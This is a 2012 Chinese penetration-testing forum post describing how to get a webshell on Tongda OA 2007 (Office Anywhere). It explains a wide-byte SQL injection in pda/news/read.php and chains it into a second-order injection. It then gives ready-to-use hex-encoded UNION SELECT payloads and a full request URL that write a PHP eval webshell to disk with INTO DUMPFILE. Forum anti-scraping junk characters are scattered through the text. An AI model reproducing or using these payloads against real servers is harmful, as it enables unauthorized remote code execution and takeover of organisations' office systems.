中国网络渗透测试联盟

标题: 通达OA2007版本漏洞及getshell [打印本页]
作者: admin    时间: 2012-12-20 08:09
标题: 通达OA2007版本漏洞及getshell
目前测试通达OA2007版本  M' C( L) l" H7 O# c. o% h/ w  q

7 y: T& |$ u) @- \' [& ~
, T  y, a' W7 R4 b8 d: HOffice Anywhere 2007 网络智能办公系统6 M5 h2 j6 n* N8 E; Y$ U' H
8 z6 h2 x) j4 P
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..& ~) y$ v% {) Y6 R( @

( e' t& Y1 e$ {' ^8 Z& N6 h * v  j% Z+ |7 p) `
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
1 @9 }9 o1 ]& }$ ^* Y : P  T$ I9 _7 g& u) i
例如:SELECT * from USER where USER_ID='{$USERNAME}'  
8 O0 }& B* K8 i) N. S1 t- B( k; L其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
  J3 T' ~: V% f; x
: `& r( P0 |" y0 W3 K/ J0 |这个时候我们是不是可以组合起来使用哪?
2 }& i; Y7 y' z3 ?3 F' g9 E9 ^   Q: ^9 l& c- a/ ?; Z1 |% P
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
6 r" t+ B% l# c; `/ Gunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10& k! c. _/ p: H8 i! w7 O1 B9 C
: \( m& n" J& w$ F3 b0 i9 Q
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
# i/ A! ?+ P! v0 j; M' C* i ! x7 x! h% F/ v& _" {3 B2 M
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。9 `1 w8 z6 f( }, o7 M4 l  |
  p. T# ^2 x  o8 Z
那么我们用字符串格式带入进行hex编码) |9 r5 y" C( _; c& n/ t8 d, G5 T

* ~/ ~/ ?" w0 T%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
2 X* r* q* L/ G " o- p) ?6 j" R& Q* v6 ?
测试ok,获取oa的webshell# V4 L# t+ ]% [/ o2 g+ f

8 z5 g6 w9 @( w
8 w% M6 I, @% `. lpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%231 S: ^* k  H# }- s( [; v
直接getwebshell



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2